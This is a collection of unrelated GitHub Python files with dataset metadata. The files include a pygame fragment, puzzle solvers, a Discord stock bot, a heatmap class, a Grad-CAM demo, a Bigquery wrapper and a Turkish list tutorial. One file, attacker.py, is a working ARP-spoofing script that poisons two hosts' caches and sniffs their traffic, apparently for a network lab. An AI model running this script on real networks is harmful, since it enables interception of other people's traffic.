if event.type == pygame.QUIT:
quit()
if keys[pygame.K_F1]:
self.getGame().reset()
self.getGame().changeScene(GameConstant.PLAYING_SCENE)
|
grapeJUICE1/Grape-Bricks
|
Game/Scenes/HighScoreScene.py
|
HighScoreScene.py
|
py
| 1,256 |
python
|
en
|
code
| 7 |
github-code
|
6
|
5467682111
|
import time
time_start = time.time()
f = open('//Users/sanderlindberg/Documents/kodekalendere/knowit/2/world.txt').read().split("\n")
def find_seq(elem):
seqs = []
overflow_ind = 0
if elem[0] == " ":
for i in range(len(elem)):
if elem[i] == "#" or i == len(elem) -1:
overflow_ind = i
seqs.append([0, i-1, True])
break
if overflow_ind != len(elem) -1:
for i in range(len(elem)-1):
start = i
end = i+1
overflow = False
if elem[start] == "#" and elem[end] == " ":
for j in range(i+1, len(elem)):
if elem[j] == " ":
end = j
elif elem[j] == "#":
break
if end == len(elem) - 1:
overflow = True
seqs.append([start+1, end, overflow])
return seqs
def calc(arr):
s = 0
for i in range(len(t)):
for j in range(len(t[i])):
if t[i][j][2] == False:
if t[i][j][0] == 0 or t[i][j][0] == 1:
s += t[i][j][1]
else:
s += t[i][j][1] - t[i][j][0] + 1
return s
t = []
count = 0
for elem in f:
if count == 0:
t.append(find_seq(elem))
count += 1
else:
if t[-1] == []:
break
t.append(find_seq(elem))
print(time.time() - time_start)
print(calc(t))
|
skanin/Julekalendere_2019
|
knowit/2/2.py
|
2.py
|
py
| 1,484 |
python
|
en
|
code
| 0 |
github-code
|
6
|
13043566776
|
from _datetime import datetime
preparation_time = 30
donation_time = 30
class EventData(object):
# @Nori
# Definition explanation comes here...
@staticmethod
def get_event_date():
global ev_date
isvaild = False
while not isvaild:
data = input("Enter your Event date (YYYY.MM.DD):")
try:
ev_date = datetime.strptime(data, "%Y.%m.%d") # Csak akkor engedi tovább az adatot ha ilyen formátumba van
if ev_date.isoweekday() != 6 and ev_date.isoweekday() != 7:
if (ev_date.date() - datetime.now().date()).days > 10:
isvaild = True
else:
print("Your donation date have to be 10 days later from now")
else:
print("Event of date must not be on weekends")
except ValueError:
print(data, "is not vaild date! Try again(YYYY.MM.DD): ex: 2010.10.10")
return ev_date
# @Nori
# Definition explanation comes here...
@staticmethod
def get_donation_start():
global don_start
isvaild = False
while not isvaild:
data = input("Enter your Start of donation (HH:MM):")
try:
don_start = datetime.strptime(data, "%H:%M") # Csak akkor engedi tovább az adatot ha ilyen formátumba van
isvaild = True
except ValueError:
print(data, "is not a valid time! HH:MM. ex: 13:10")
return don_start
# @Bandi
# Definition explanation comes here... A donation event vége. HH:MM formátmban, pl 12:10
@staticmethod
def get_donation_end():
global don_end
isvaild = False
while not isvaild:
data = input("Enter your End of donation (HH:MM):")
try:
don_end = datetime.strptime(data, "%H:%M") # Csak akkor engedi tovább az adatot ha ilyen formátumba van
if don_start < don_end:
isvaild = True
else:
print("Donation End have to be later thad Donation Start! (Donation start:", don_start.strftime("%H:%M"), "):")
except ValueError:
print(data, "is not a valid time! HH:MM. ex: 13:10")
return don_end
# @Bandi
# Definition explanation comes here... nem nulla az első szám, és 4 karakter valamint csak számok.
@staticmethod
def get_zip_code():
isvaild = False
while not isvaild:
ZIP = input("Enter your ZIP CODE (XXXX):")
try:
if int(ZIP) and len(ZIP) == 4:
if ZIP[0] != "0":
isvaild = True
else:
print(ZIP, "is not vaild! 1. number must not be 0!")
else:
print("ZIP must be 4 digits!")
except ValueError:
print("Only Numbers!")
return ZIP
# @Atilla
# Asks for the donor's city.
@staticmethod
def get_city():
cities = ["Miskolc", "Kazincbarcika", "Szerencs", "Sarospatak"]
# Asks for the input here first.
city = input("Please enter the donor's city: ")
# Keeps asking for the city while it does not match one from the cities list.
while city not in cities:
city = input("Donor's are accepted only from the following cities:\
Miskolc, Kazincbarcika, Szerencs and Sarospatak: ")
# Returns with the city.
return city
# @Atilla
# Asks for the donor's address.
@staticmethod
def get_address():
# Asks for the input here first.
street = input("Please enter the donor's address: ")
# Keeps asking for the address while it does not less or equal than 25 characters.
while len(street) <= 25:
street = input("The address should be less than 25 characters!: ")
# Returns with the address.
return street
# @Mate
# Definition explanation comes here...
@staticmethod
def get_available_beds():
return True
# @Mate
# Definition explanation comes here...
@staticmethod
def get_planned_donor_number():
return True
# @Adam
# Definition explanation comes here...
@staticmethod
def success_rate():
return True
|
Bandita69/TFF
|
Event.py
|
Event.py
|
py
| 4,417 |
python
|
en
|
code
| 1 |
github-code
|
6
|
29099358897
|
from extra_functions import rgb_to_hex, hex_to_rgb
class Heatmap:
def __init__(self):
self.fact_cache = {}
@staticmethod
def _color_dict(gradient):
""" Takes in a list of RGB sub-lists and returns dictionary of
colors in RGB and hex form for use in a graphing function
defined later on """
return {"hex": [rgb_to_hex(rgb) for rgb in gradient],
"r": [rgb[0] for rgb in gradient],
"g": [rgb[1] for rgb in gradient],
"b": [rgb[2] for rgb in gradient]}
def _linear_gradient(self, start_hex, end_hex="#FFFFFF", colour_amount=1000):
''' returns a gradient list of (n) colors between
two hex colors. start_hex and finish_hex
should be the full six-digit color string,
inlcuding the number sign ("#FFFFFF") '''
# Starting and ending colors in RGB form
start_colour = hex_to_rgb(start_hex)
end_colour = hex_to_rgb(end_hex)
# Initialize a list of the output colors with the starting color
rgb_list = [start_colour]
# Calculate a color at each evenly spaced value of t from 1 to n
for counter in range(1, colour_amount):
# Interpolate RGB vector for color at the current value of t
curr_vector = [int(start_colour[column] + (float(counter) / (colour_amount-1)) *
(end_colour[column] - start_colour[column])) for column in range(3)]
# Add it to our list of output colors
rgb_list.append(curr_vector)
return self._color_dict(rgb_list)
def poly_linear_gradient(self, colors, n):
''' returns a list of colors forming linear gradients between
all sequential pairs of colors. "n" specifies the total
number of desired output colors '''
# The number of colors per individual linear gradient
n_out = int(float(n) / (len(colors) - 1))
# returns dictionary defined by color_dict()
gradient_dict = self._linear_gradient(colors[0], colors[1], n_out)
if len(colors) > 1:
for col in range(1, len(colors) - 1):
next = self._linear_gradient(colors[col], colors[col+1], n_out)
for k in ("hex", "r", "g", "b"):
# Exclude first point to avoid duplicates
gradient_dict[k] += next[k][1:]
return gradient_dict
@staticmethod
def get_complementary(color):
# strip the # from the beginning
color = color[1:]
# convert the string into hex
color = int(color, 16)
# invert the three bytes
# as good as substracting each of RGB component by 255(FF)
comp_color = 0xFFFFFF ^ color
# convert the color back to hex by prefixing a #
comp_color = "#%06X" % comp_color
# return the result
return comp_color
@staticmethod
def _convert_percentiles(well_dict, percentiles):
well_values = [value for wells, value in well_dict.items() if value != "nan"]
max_values = max(well_values)
min_values = min(well_values)
percentile_dict = {"high": {"max": max_values, "min": "", "mid": ""},
"low": {"max": "", "min": min_values, "mid": ""}}
if percentiles["low"] != 0:
percentile_dict["low"]["max"] = (max_values / 100) * percentiles["low"]
else:
percentile_dict["low"]["max"] = min_values
if percentiles["high"] != 100:
percentile_dict["high"]["min"] = (max_values / 100) * percentiles["high"]
else:
percentile_dict["high"]["min"] = max_values
if percentiles["mid"]:
percentile_dict["high"]["mid"] = (((max_values - min_values) / 100) * percentiles["mid"]) + min_values
percentile_dict["low"]["mid"] = (((max_values - min_values)/ 100) * percentiles["mid"]) + min_values
print(percentile_dict)
return percentile_dict, max_values, min_values
@staticmethod
def _samples_per_percentile(well_dict, percentile_dict, colour_amount):
wells_percentile_dict = {}
for well in well_dict:
wells_percentile_dict[well] = {}
if well_dict[well] >= percentile_dict["high"]["mid"]:
wells_percentile_dict[well]["percentile"] = "high"
if percentile_dict["high"]["max"] >= well_dict[well] >= percentile_dict["high"]["min"]:
wells_percentile_dict[well]["colour_value"] = colour_amount
else:
percent_of_range = 100 / (percentile_dict["high"]["min"] - percentile_dict["high"]["mid"]) * \
(well_dict[well] - percentile_dict["high"]["mid"])
colour_value = colour_amount/100 * percent_of_range
wells_percentile_dict[well]["colour_value"] = colour_value
elif percentile_dict["high"]["mid"] > well_dict[well] >= percentile_dict["low"]["min"]:
wells_percentile_dict[well]["percentile"] = "low"
if percentile_dict["low"]["max"] >= well_dict[well] >= percentile_dict["low"]["min"]:
wells_percentile_dict[well]["colour_value"] = 0
else:
percent_of_range = 100 / (percentile_dict["low"]["mid"] - percentile_dict["low"]["max"]) * \
(well_dict[well] - percentile_dict["low"]["max"])
colour_value = colour_amount/100 * percent_of_range
wells_percentile_dict[well]["colour_value"] = colour_value
#
# if well_dict[well] >= percentile_dict[percentile]:
# try:
# if wells_percentile_dict[well]["lower_bound"] < percentile_dict[percentile]:
# wells_percentile_dict[well]["lower_bound"] = percentile
# except KeyError:
# wells_percentile_dict[well]["lower_bound"] = percentile
#
# if well_dict[well] <= percentile_dict[percentile]:
# try:
# if wells_percentile_dict[well]["upper_bound"] > percentile_dict[percentile]:
# wells_percentile_dict[well]["upper_bound"] = percentile_dict[percentile]
# except KeyError:
# wells_percentile_dict[well]["upper_bound"] = percentile_dict[percentile]
return wells_percentile_dict
@staticmethod
def dict_convert(well_dict, state_dict, states):
heatmap_dict = {}
for well in well_dict:
if state_dict[well]["state"] in states:
heatmap_dict[well] = well_dict[well]
return heatmap_dict
@staticmethod
def get_well_colour(colour_dict, wells_percentile_dict, well):
# temp_well_value = round(well_dict[well] / well_percentile_dict[well]["upper_bound"] * 1000)
# well_percentile = well_percentile_dict[well]["lower_bound"]
try:
colour_bound = wells_percentile_dict[well]["percentile"]
except KeyError:
return "white"
well_colour_value = round(wells_percentile_dict[well]["colour_value"])
try:
well_colour = colour_dict[colour_bound]["hex"][well_colour_value]
except IndexError:
well_colour = colour_dict[colour_bound]["hex"][-1]
return well_colour
def heatmap_colours(self, well_dict, percentile, colours):
percentile_dict, max_values, min_values = self._convert_percentiles(well_dict, percentile)
colour_amount = 1000
colour_dict = {}
for percentile in percentile_dict:
colour_dict[percentile] = self.poly_linear_gradient(colours[percentile], colour_amount)
well_percentile_dict = self._samples_per_percentile(well_dict, percentile_dict, colour_amount)
return colour_dict, well_percentile_dict, max_values, min_values
if __name__ == "__main__":
start_hex = "#5cb347"
end_hex = "#5cb347"
mid_2 = "#5cb347"
mid_3 = "#5cb347"
mid_hex = [2, 1]
colour_list = [start_hex, mid_2, mid_2, mid_3, mid_3, end_hex]
hm = Heatmap()
print(hm.bezier_gradient(colour_list, 5))
|
ZexiDilling/structure_search
|
heatmap.py
|
heatmap.py
|
py
| 8,347 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17221793090
|
import json
import aiohttp
import discord
import datetime
from discord import Embed
import plotly.express as px
import pandas as pd
import random
with open("config.json", "r") as config:
data = json.load(config)
token = data["Token"]
prefix = data["Prefix"]
intents = discord.Intents.default()
intents.members = True
client = discord.Client(intents=intents)
@client.event
async def on_ready():
print("ready")
@client.event
async def on_message(ticker):
if prefix in ticker.content:
try:
urlchart = "https://query1.finance.yahoo.com/v8/finance/chart/{}?symbol={}&period1=1653192000&period2={}&useYfid=true&interval=1d&includePrePost=true&events=div|split|earn&lang=en-CA®ion=CA&crumb=y.I3QERsNxs&corsDomain=ca.finance.yahoo.com".format(ticker.content.replace("$","").upper(),ticker.content.replace("$","").upper(),str(int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())))
urlticker = "https://query2.finance.yahoo.com/v7/finance/quote?formatted=true&crumb=wkU/diDLxbC&lang=en-US®ion=US&symbols={}&fields=messageBoardId,longName,shortName,marketCap,underlyingSymbol,underlyingExchangeSymbol,headSymbolAsString,regularMarketPrice,regularMarketChange,regularMarketChangePercent,regularMarketVolume,uuid,regularMarketOpen,fiftyTwoWeekLow,fiftyTwoWeekHigh,toCurrency,fromCurrency,toExchange,fromExchange,corporateActions&corsDomain=finance.yahoo.com".format(ticker.content.replace("$","").upper())
headers = {"accept": "*/*","accept-language": "en-US,en;q=0.7","sec-fetch-dest": "empty","sec-fetch-mode": "cors","sec-fetch-site": "same-site","sec-gpc": "1","referrer": "https://ca.finance.yahoo.com/","referrerPolicy": "no-referrer-when-downgrade","body": "null","method": "GET","mode": "cors","credentials": "include"}
getCdata = await chartData(urlchart,headers)
getTdata = await tickerData(urlticker,headers)
plotted = await plot(getCdata,getTdata['tick'])
embeds = await embed(getTdata, plotted)
await sendOut(embeds,ticker,plotted)
except Exception as e:
print("failed {}".format(e))
async def chartData(url,headers):
async with aiohttp.ClientSession() as chartdata:
async with chartdata.get(url,headers=headers) as get:
d = {}
chartdata_json = json.loads(await get.text())
chartdata_json = chartdata_json['chart']['result'][0]
timestamps = chartdata_json["timestamp"]
dates = []
for each in timestamps:
dates.append(datetime.datetime.fromtimestamp(each).strftime('%Y-%m-%d %H:%M:%S'))
openData = chartdata_json["indicators"]["quote"][0]['open']
closeData = chartdata_json["indicators"]["quote"][0]['close']
highData = chartdata_json["indicators"]["quote"][0]['high']
lowData = chartdata_json["indicators"]["quote"][0]['low']
volumeData = chartdata_json["indicators"]["quote"][0]['volume']
d["Dates"] = dates
d["Open"] = openData
d["Close"] = closeData
d["High"] = highData
d["Low"] = lowData
d["Volume"] = volumeData
return d
async def tickerData(url,headers):
async with aiohttp.ClientSession() as tickerdata:
async with tickerdata.get(url,headers=headers) as get:
ticker_json = json.loads(await get.text())
ticker_json = ticker_json['quoteResponse']['result'][0]
d = {}
d['tick'] = ticker_json['symbol']
d['currentPrice'] = ticker_json["regularMarketPrice"]['fmt']
d['marketCap'] = ticker_json['marketCap']['fmt']
d['marketTime'] = ticker_json['regularMarketTime']['fmt']
d['percentChangedDay'] = ticker_json['regularMarketChangePercent']['fmt']
d['marketRange'] = ticker_json['regularMarketDayRange']['fmt']
d['yearlyLowChange'] = ticker_json['fiftyTwoWeekLowChange']['fmt']
d['percentYearlyLow'] = ticker_json['fiftyTwoWeekHighChangePercent']['fmt']
d['regMarketHigh'] = ticker_json['regularMarketDayHigh']['fmt']
d['sharesOut'] = ticker_json['sharesOutstanding']['fmt']
d['regPrevClose'] = ticker_json['regularMarketPreviousClose']['fmt']
d['yearlyHigh'] = ticker_json['fiftyTwoWeekHigh']['fmt']
d['yearlyhighChange'] = ticker_json['fiftyTwoWeekHighChange']['fmt']
d['yearlyRange'] = ticker_json['fiftyTwoWeekRange']['fmt']
d['regMarketChange'] = ticker_json['regularMarketChange']['fmt']
d['yearlyLow'] = ticker_json['fiftyTwoWeekLow']['fmt']
d['marketVol'] = ticker_json['regularMarketVolume']['fmt']
d['regMarketLow'] = ticker_json['regularMarketDayLow']['fmt']
d['shortName'] = ticker_json['shortName']
return d
async def plot(datas,tick):
df = pd.DataFrame(datas)
fig = px.line(df, title="{} Chart".format(tick), x = "Dates", y =["Open","Close","High","Low"])
fig.update_layout(paper_bgcolor="black",plot_bgcolor="black")
openImgDir = "{}.jpg".format(tick+str(random.randint(0,1000000)))
fig.write_image(openImgDir)
df1 = pd.DataFrame(datas)
fig1 = px.line(df1, title="{} Volume Chart".format(tick), x = "Dates", y ="Volume")
fig1.update_layout(paper_bgcolor="black",plot_bgcolor="black")
volImgDir = "{}.jpg".format(tick+str(random.randint(0,1000000)))
fig1.write_image(volImgDir)
return openImgDir, volImgDir
async def embed(Tdata,plotted):
embeds = []
embed = discord.Embed()
embed1 = discord.Embed()
embed2 = discord.Embed()
embed.title = "${} Stock Info".format(Tdata['tick'])
embed.description = "Market statistics and data for {}".format(Tdata['shortName'])
embed.add_field(name="Ticker", value=Tdata['tick'], inline=True)
embed.add_field(name="Current Market Time", value=Tdata['marketTime'], inline=True)
embed.add_field(name="Current Price", value=Tdata['currentPrice'], inline=True)
embed.add_field(name="Market Cap", value=Tdata['marketCap'], inline=True)
embed.add_field(name="24Hr High", value=Tdata['regMarketHigh'], inline=True)
embed.add_field(name="24hr Low", value=Tdata['regMarketLow'], inline=True)
embed.add_field(name="24Hr Difference", value=Tdata['regMarketChange'], inline=True)
embed.add_field(name="24Hr %", value=Tdata['percentChangedDay'], inline=True)
embed.add_field(name="24Hr Range", value=Tdata['marketRange'], inline=True)
embed.add_field(name="Market Volume", value=Tdata['marketVol'], inline=True)
embed.add_field(name="Outstanding Shares", value=Tdata['sharesOut'], inline=True)
embed.add_field(name="Previous Close", value=Tdata['regPrevClose'], inline=True)
embed.add_field(name="52w Price Difference", value=Tdata['yearlyLowChange'], inline=True)
embed.add_field(name="52w %", value=Tdata['percentYearlyLow'], inline=True)
embed.add_field(name="52w High", value=Tdata['yearlyHigh'], inline=True)
embed.add_field(name="52w High Difference", value=Tdata['yearlyhighChange'], inline=True)
embed.add_field(name="52w Range", value=Tdata['yearlyRange'], inline=True)
embed.add_field(name="52w Low", value=Tdata['yearlyLow'], inline=True)
embed1.set_image(url="attachment://{}".format(plotted[0]))
embed2.set_image(url="attachment://{}".format(plotted[1]))
embeds.append(embed)
embeds.append(embed1)
embeds.append(embed2)
return embeds
async def sendOut(embeds,ticker,plotted):
await ticker.channel.send(embed=embeds[0])
with open(plotted[0], 'rb') as image1:
await ticker.channel.send(file=discord.File(image1, filename=plotted[0]))
with open(plotted[1], 'rb') as image2:
await ticker.channel.send(file=discord.File(image2, filename=plotted[1]))
client.run(token)
|
Eryck13/StockBot
|
main.py
|
main.py
|
py
| 8,237 |
python
|
en
|
code
| 0 |
github-code
|
6
|
70488529787
|
# accepted on codewars.com
import sys
deltas = [[-2, -1, 1, 2, 2, 1, -1, -2], [1, 2, 2, 1, -1, -2, -2, -1]]
order = [4, 0, 5, 1, 6, 2, 7, 3]
adjOnes = [[-1, 0, 1, 0], [0, 1, 0, -1]]
flag: bool
coordinates_of_knight: list[list[int]]
def knights_tour(start: tuple[int, int], size: int):
global flag, coordinates_of_knight
board = [[0] * size for _ in range(size)]
flag = True
board[start[0]][start[1]] = 1
coordinates_of_knight = [start]
# checks coordinates if they are located inside the board
def is_valid(board_size: int, j: int, i: int) -> bool:
return 0 <= i < board_size and 0 <= j < board_size
def next_possible_cells(curr_j: int, curr_i: int) -> int: # both these methods can be simplified to one method,
# but let them be in order to achieve a greater understandability
nextPossibleCells = 0
for i in range(0, len(deltas[0])):
if is_valid(size, curr_j + deltas[0][i], curr_i + deltas[1][i]) and board[curr_j + deltas[0][i]][curr_i + deltas[1][i]] == 0:
nextPossibleCells += 1
return nextPossibleCells
def adjacent_possible_cells(curr_j: int, curr_i: int):
adjacentPossibleCells = 0
for i in range(0, len(adjOnes[0])):
if is_valid(size, curr_j + adjOnes[0][i], curr_i + adjOnes[1][i]) and board[curr_j + adjOnes[0][i]][curr_i + adjOnes[1][i]] == 0:
adjacentPossibleCells += 1
return adjacentPossibleCells
# linear recursion with Warnsdorf's heuristic, adj and angle minimization ath the every step and backtracking
def recursive_seeker(j: int, i: int, counter: int) -> None: # works better, but cannot handle really big sizes...
global flag, coordinates_of_knight
# needs to be run with special parameters
if counter == size * size + 1:
flag = False
return
allPossibleCells = dict()
for index in range(0, len(deltas[0])):
if is_valid(size, j + deltas[0][index], i + deltas[1][index]) and board[j + deltas[0][index]][i + deltas[1][index]] == 0:
allPossibleCells[index] = next_possible_cells(j + deltas[0][index], i + deltas[1][index])
if len(allPossibleCells) > 0:
minValueNext = len(deltas[0])
minValueAdj = len(adjOnes[0])
minAngleKey: int
for key in allPossibleCells.keys():
if allPossibleCells.get(key) < minValueNext:
minValueNext = allPossibleCells.get(key)
minNextPossCells = dict()
for key in allPossibleCells.keys():
if allPossibleCells.get(key) == minValueNext:
minNextPossCells[key] = adjacent_possible_cells(j + deltas[0][key], i + deltas[1][key])
for key in minNextPossCells.keys():
if minNextPossCells.get(key) < minValueAdj:
minValueAdj = minNextPossCells.get(key)
minNextPossAdjCells = dict()
for key in minNextPossCells.keys():
if minNextPossCells.get(key) == minValueAdj:
minNextPossAdjCells[key] = minNextPossCells[key]
for k in range(0, len(order)):
if flag and order[k] in minNextPossAdjCells.keys():
minAngleKey = order[k]
board[j + deltas[0][minAngleKey]][i + deltas[1][minAngleKey]] = counter
coordinates_of_knight.append((j + deltas[0][minAngleKey], i + deltas[1][minAngleKey]))
recursive_seeker(j + deltas[0][minAngleKey], i + deltas[1][minAngleKey], counter + 1)
if flag:
board[j + deltas[0][minAngleKey]][i + deltas[1][minAngleKey]] = 0
coordinates_of_knight = coordinates_of_knight[:-1]
recursive_seeker(start[0], start[1], 1 + 1)
for arr in board:
print(arr)
print()
print(f'length: {len(coordinates_of_knight)}')
return coordinates_of_knight
# print(knights_tour([0, 0], 10))
sys.setrecursionlimit(1000000)
print(knights_tour((0, 0), 43))
# print([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11][:-1])
|
LocusLontrime/Python
|
CodeWars_Rush/_4kyu/A_Knights_Tour_4kyu.py
|
A_Knights_Tour_4kyu.py
|
py
| 4,194 |
python
|
en
|
code
| 1 |
github-code
|
6
|
12229413948
|
import torch
import torchvision
import PIL
import torch.nn.functional as F
import numpy
from matplotlib import cm
#CAM
def hook_store_A(module, input, output):
module.A = output[0]
def hook_store_dydA(module, grad_input, grad_output):
module.dydA = grad_output[0]
if __name__ == "__main__":
model = torchvision.models.vgg19(pretrained=True)
to_tensor = torchvision.transforms.ToTensor()
img = PIL.Image.open('elephant_hippo.jpeg')
input = to_tensor(img).unsqueeze(0)
layer = model.features[35]
layer.register_forward_hook(hook_store_A)
layer.register_backward_hook(hook_store_dydA)
output = model(input)
c = 386 # African elephant
output[0, c].backward()
alpha = layer.dydA.mean((2, 3), keepdim=True)
L = torch.relu((alpha * layer.A).sum(1, keepdim=True))
L = L / L.max()
L = F.interpolate(L, size=(input.size(2), input.size(3)),
mode='bilinear', align_corners=False)
l = L.view(L.size(2), L.size(3)).detach().numpy()
PIL.Image.fromarray(numpy.uint8(cm.gist_earth(l) * 255)).save('result.png')
res = PIL.Image.open('result.png')
img=img.convert('RGBA')
merge_res = PIL.Image.blend(img, res, 0.8)
merge_res.save('result-merge.png')
|
pengxj/DeepLearningCourse
|
code/VisInput.py
|
VisInput.py
|
py
| 1,281 |
python
|
en
|
code
| 9 |
github-code
|
6
|
35227507194
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 18 01:16:56 2017
@author: Leon
"""
from osgeo import gdal
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy import spatial
import cv2
im = cv2.imread('fill.jpg')
ntu = cv2.imread('DSCF2098_1471837627895.jpg')
imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
ret,thresh = cv2.threshold(imgray,127,255,0)
__,contours, hierarchy = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
print("there are " + str(len(contours)) + " contours")
#size
[h,w,_] = im.shape
im_final = np.zeros((h,w))
cnt = contours[0]
print("there are " + str(len(cnt)) + " points in contours[0]")
approx = cv2.approxPolyDP(cnt,30,True)
print("after approx, there are " + str(len(approx)) + " points")
print(approx)
cv2.drawContours(im,[approx],0,(255,0,0),-1)
contours.sort(key=len,reverse = True)
cnt = contours[0]
print("there are " + str(len(cnt)) + " points in contours[1]")
approx = cv2.approxPolyDP(cnt,50,True)
print("after approx, there are " + str(len(approx)) + " points")
print(approx)
cv2.drawContours(im,[approx],0,(0,255,0),-1)
cv2.drawContours(ntu,[approx],-1,(255,0,0),3)
cv2.drawContours(im_final,[approx],-1,(255,255,255),-1)
cv2.imwrite('contour.jpg',im)
cv2.imwrite('contour_ntu.jpg',ntu)
cv2.imwrite('final_building.jpg',im_final)
|
LeonChen66/UAV-and-TrueOrtho
|
Building Roof Contour/RDP.py
|
RDP.py
|
py
| 1,318 |
python
|
en
|
code
| 8 |
github-code
|
6
|
31838419123
|
import numpy as np
try:
import cPickle as pickle
except:
import pickle
from dataset.mnist import load_mnist
from SGD.TwoLayerNet import TwoLayerNet
(x_train, t_train), (x_test, t_test) = load_mnist\
(normalize=False,flatten=True,one_hot_label=True)
train_loss = []
'''超参数'''
iters_num = 1000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
network = TwoLayerNet(input_size = 784, hide_size = 50, output_size = 10)
for i in range(iters_num):
# 获取mini-batch
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]
# 计算梯度
grad = network.numerical_gradient(x_batch, t_batch)
# grad = network.gradient(x_batch, t_batch) # 高速版!
# 更新参数
for key in ('w1', 'b1', 'w2', 'b2'):
network.params[key] -= learning_rate * grad[key]
# 记录学习过程
loss = network.loss(x_batch, t_batch)
train_loss.append(loss)
print(train_loss)
output = open('network_params.pkl','wb')
pickle.dump(network.params,output)
output.close()
|
maplect/CNN-APP
|
SGD/Neuralnet_train.py
|
Neuralnet_train.py
|
py
| 1,093 |
python
|
en
|
code
| 2 |
github-code
|
6
|
22357678211
|
# -*- coding: utf-8 -*-
from odoo import _, models, fields, api
class SelectPurchaseOrder(models.TransientModel):
_name = 'select.purchase.order'
purchaseorder_ids = fields.Many2many('purchase.order', string='Purchase Order')
@api.multi
def select_purchaseorders(self):
spp_id = self.env['spp'].browse(self._context.get('active_id', False))
if self.payment_type == 'BILL':
for order in self.purchaseorder_ids:
self.env['spp.line.bill'].create({
'purchaseorder_id': order.id,
'spp_id': spp_id.id
})
else:
for order in self.purchaseorder_ids:
self.env['spp.line'].create({
'purchaseorder_id': order.id,
'spp_id': spp_id.id
})
# spp_id._update_link_account_invoice(spp_id.id)
|
detian08/bsp_addons
|
account-payment-11.0/account_payment_spp/wizard/select_purchaseorder_wizard.py
|
select_purchaseorder_wizard.py
|
py
| 920 |
python
|
en
|
code
| 1 |
github-code
|
6
|
31449582311
|
import sys
import time
from multiprocessing import Process
from scapy.all import *
def arp_spoof(victim_ip, bystander_ip, attacker_mac):
try:
while True:
send(ARP(op=2, pdst=victim_ip, psrc=bystander_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=attacker_mac), verbose=0)
send(ARP(op=2, pdst=bystander_ip, psrc=victim_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=attacker_mac), verbose=0)
time.sleep(1)
except KeyboardInterrupt:
sys.exit(0)
def packet_sniffer():
def sniff_callback(packet):
if packet.haslayer(IP):
print(f"Sniffed packet: {packet[IP].src} -> {packet[IP].dst}")
sniff(prn=sniff_callback, filter="ip", store=0)
def main():
victim_ip = "192.168.56.20"
bystander_ip = "192.168.56.30"
# Get the attacker's MAC address
attacker_mac = get_if_hwaddr(conf.iface)
# Start the ARP spoofing process
arp_spoof_process = Process(target=arp_spoof, args=(victim_ip, bystander_ip, attacker_mac))
arp_spoof_process.start()
# Start the packet sniffing process
packet_sniffer_process = Process(target=packet_sniffer)
packet_sniffer_process.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
arp_spoof_process.terminate()
packet_sniffer_process.terminate()
if __name__ == "__main__":
main()
|
emrberk/network-attacks
|
attacker/attacker.py
|
attacker.py
|
py
| 1,369 |
python
|
en
|
code
| 0 |
github-code
|
6
|
20210291556
|
import re
txt = "The rain in Spain"
x = re.search("^The.*Spain$", txt)
if x:
print("YES! We have a match!")
else:
print("No match")
x = re.findall("ai", txt)
print(x)
x = re.split("\s", txt)
print(x)
txt = "The rain in Spain"
x = re.split("\s", txt, 1)
print(x)
txt = "The rain in Spain"
x = re.sub("\s", "9", txt)
print(x)
txt = "The rain in Spain"
x = re.sub("\s", "9", txt, 2)
print(x)
txt = "The rain in Spain"
x = re.search("ai", txt)
print(x)
"""
.span() returns a tuple containing the start-, and end positions of the match.
.string returns the string passed into the function
.group() returns the part of the string where there was a match
"""
txt = "The rain in Spain Sos"
x = re.search(r"\bS\w+", txt)
print(x.span())
print(x.string)
print(x.group())
|
Nayassyl/22B050835
|
week5/w3schools/regex.py
|
regex.py
|
py
| 768 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27630602762
|
#!/usr/bin/env python3
import string
with open("game.py") as f:
game_str = f.read()
with open("style.css") as f:
style_str = f.read()
with open("index.html.template") as f:
template_str = f.read()
t = string.Template(template_str)
out_str = t.substitute(python_code=game_str, style_sheet=style_str)
with open("index.html", "w") as f:
f.write(out_str)
|
jthacker/memory_game
|
build.py
|
build.py
|
py
| 372 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43001373047
|
__author__ = "Vikram Anand"
__email__ = "[email protected]"
__license__ = "Apache 2.0"
__maintainer__ = "developer"
__status__ = "Production"
__version__ = "0.0.1"
import os
import logging
from google.cloud import bigquery, storage
logger = logging.getLogger('BigQuery')
class BigQuery:
"""Class Bigquery to connect and execute a query."""
def __init__(self, source_project = 'hmh-carenostics-dev', source_dataset = 'ckd_table'):
"""Class Bigquery to connect and execute a query."""
self.source_project = source_project
self.source_dataset = source_dataset
self.__initialize()
def __initialize(self):
self.client = bigquery.Client(project=self.source_project)
def query(self, query):
query_df = self.client.query(query).result().to_dataframe()
return query_df
|
RiptideStar/DataStack-main
|
hmhn/scripts/old-postgress/python-scripts/metrics/carenostics/big_query.py
|
big_query.py
|
py
| 814 |
python
|
en
|
code
| 0 |
github-code
|
6
|
35862756028
|
### VERI YAPILARI
## 1) Liste Olusturma;
liste = ["a", 19.3, 30]
liste_iki = [1, 2, 3, 4, 5]
tum_liste = [liste, liste_iki]
print(len(liste))
print(len(liste_iki))
print(liste[2])
print(liste_iki[3])
type(liste[2]) # Liste icindeki bir elemanin turu
print(tum_liste)
len(tum_liste)
print(tum_liste[1])
type(tum_liste[1])
print(tum_liste[1][2]) # Liste icindeki listenin elemanina ulasmak icin!
# Listelere eleman EKLEME / DEGISTIRME / SILME
# Eleman Degistirme;
liste = ["anil", "rumeysa", "tilda"]
liste[2] = "defne"
print(liste)
liste = ["anil", "rumeysa", "tilda"]
liste[0:2] = "hakan", "melda" # Sifirdan iki'ye kadar degisiklik yani 0. ve 1. terim degisecek.)
print(liste)
# Eleman Ekleme;
liste = ["anil", "rumeysa", "tilda"]
print(liste + ["defne"]) # Kalici bir ekleme olmasini istiyorsan yeni liste tanimlanir.
